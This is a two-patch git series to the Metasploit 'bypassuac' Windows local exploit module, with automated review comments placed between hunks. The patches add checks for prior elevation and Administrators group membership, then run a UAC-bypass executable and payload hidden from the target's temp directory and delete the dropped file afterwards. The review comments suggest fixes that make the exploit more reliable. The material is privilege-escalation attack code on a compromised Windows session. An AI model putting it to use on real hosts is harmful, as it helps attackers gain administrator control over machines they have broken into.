From 7d41f1f9a05e5b85456be7d62564cd34ac204ffa Mon Sep 17 00:00:00 2001
From: Rob Fuller
Date: Wed, 14 Nov 2012 23:54:01 -0500
Subject: [PATCH 1/2] add admin already and admin group checks
---
modules/exploits/windows/local/bypassuac.rb | 34 +++++++++++++++++++--
1 file changed, 32 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
index a0d30aac47..13f8becb7f 100644
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -50,6 +50,11 @@ class Metasploit3 < Msf::Exploit::Local
def exploit
+ isadmin = session.railgun.shell32.IsUserAnAdmin()
+ if isadmin['return']
+ print_error('Already in elevated state. Exiting...')
+ return
+ end
#
# Verify use against Vista+
@@ -95,6 +100,31 @@ class Metasploit3 < Msf::Exploit::Local
return
end
+ # Check if you are an admin
+ print_status('Checking admin status...')
+ whoami = session.sys.process.execute('cmd /c whoami /groups',
+ nil,
+ {'Hidden' => true, 'Channelized' => true}
+ )
+ cmdout = []
+ isinadmins = []
+ while(cmdoutput = whoami.channel.read)
+ cmdout << cmdoutput
+ end
+ if cmdout.size == 0
+ print_error('Either whoami is not there or failed to execute')
+ print_error('Continuing under assumption you already checked...')
+ else
+ isinadmins = cmdout[0].split("\r\n").grep(/S-1-5-32-544/)
+ if isinadmins.size > 0
+ print_good('Part of Administrators group! Continuing...')
+ else
+ print_error('Not in admins group, cannot escalate with this module')
+ print_error('Exiting...')
+ return
+ end
+ end
+
+ # # Generate payload and random names for upload #
@@ -118,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local
end
tmpdir = session.fs.file.expand_path("%TEMP%")
- cmd = "#{tmpdir}\\#{bypass_uac_filename} /c %TEMP%\\#{payload_filename}"
+ cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
print_status("Uploading the bypass UAC executable to the filesystem...")
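Review bot: The elevation check added at the top of `exploit` calls shell32!IsUserAnAdmin, an API Microsoft documents as deprecated and possibly unavailable in later Windows versions, and nothing in the hunk records that dependency or what a truthy `isadmin['return']` means here; a comment such as `# IsUserAnAdmin (deprecated, may be unavailable on newer Windows) returns true when the token is already elevated, so there is nothing to bypass` would make the early exit self-explanatory. If the railgun call fails it presumably raises out of `exploit` before the Vista+ verification that follows this hunk, so consider rescuing it, printing a warning and continuing rather than aborting on an unknown elevation state. The check also runs before the OS-version verification, so on a pre-Vista target 'Already in elevated state' would presumably be printed for a host that has no UAC at all; moving the check after that verification would keep the messages accurate. `exploit` continues past the end of this hunk.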
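Review bot: Only the first chunk read from the channel is searched in the group check: `cmdout[0].split("\r\n").grep(/S-1-5-32-544/)` ignores every later read collected by the while loop, so if the `whoami /groups` output arrives in more than one read the Administrators SID can be missed and the module exits with 'Not in admins group' on a host that is eligible. Joining the chunks before splitting fixes it: `isinadmins = cmdout.join.split("\r\n").grep(/S-1-5-32-544/)`. The `isinadmins = []` initialisation above the loop is then dead, and `cmdout.size == 0` / `isinadmins.size > 0` read more idiomatically as `cmdout.empty?` / `isinadmins.any?`. The spawned whoami process is never closed after its channel is drained, which leaves a handle open on the target for the rest of the run; if the process object returned by `execute` exposes `close`, call it once the loop finishes. `exploit` begins before this hunk.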
@@ -148,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Local
# delete the uac bypass payload
delete_file = "cmd.exe /c del #{tmpdir}\\#{bypass_uac_filename}"
- session.sys.process.execute(delete_file, nil, {'Hidden' => true})
+ #session.sys.process.execute(delete_file, nil, {'Hidden' => true})
end
end
From e18acf21033c9d8fc686bc87fc4fad28a37f811a Mon Sep 17 00:00:00 2001
From: Rob Fuller
Date: Wed, 14 Nov 2012 23:56:32 -0500
Subject: [PATCH 2/2] remove debugging code
---
modules/exploits/windows/local/bypassuac.rb | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
index 13f8becb7f..8eab936ebf 100644
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local
end
tmpdir = session.fs.file.expand_path("%TEMP%")
- cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
+ cmd = "#{tmpdir}\\#{bypass_uac_filename} /c %TEMP%\\#{payload_filename}"
print_status("Uploading the bypass UAC executable to the filesystem...")
@@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Local
# delete the uac bypass payload
delete_file = "cmd.exe /c del #{tmpdir}\\#{bypass_uac_filename}"
- #session.sys.process.execute(delete_file, nil, {'Hidden' => true})
+ session.sys.process.execute(delete_file, nil, {'Hidden' => true})
end
end